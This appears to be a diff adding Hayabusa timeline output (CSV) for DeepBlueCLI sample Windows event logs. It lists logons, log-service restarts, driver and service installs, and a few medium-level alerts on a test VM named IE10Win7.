+2014-11-27 03:17:05.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:30:40.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:47.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:23:13.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:13.240 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:19.075 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account:  | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:30.884 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:31.757 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account:  | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:23:33.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account:  | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:11.865 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:17.909 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:18.237 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:19.969 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:20.281 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:20.452 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:23.245 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:30.249 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:31.310 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:33.925 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:34.362 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:36.015 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:38.153 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:38.823 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account:  | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:39.011 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account:  | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:41.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:44.783 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:53.788 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:05.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:53.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:26:42.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:10.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:48:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:20.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:36.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:48:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:38.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:42.406 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b2fd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:28:38.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:29:27.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
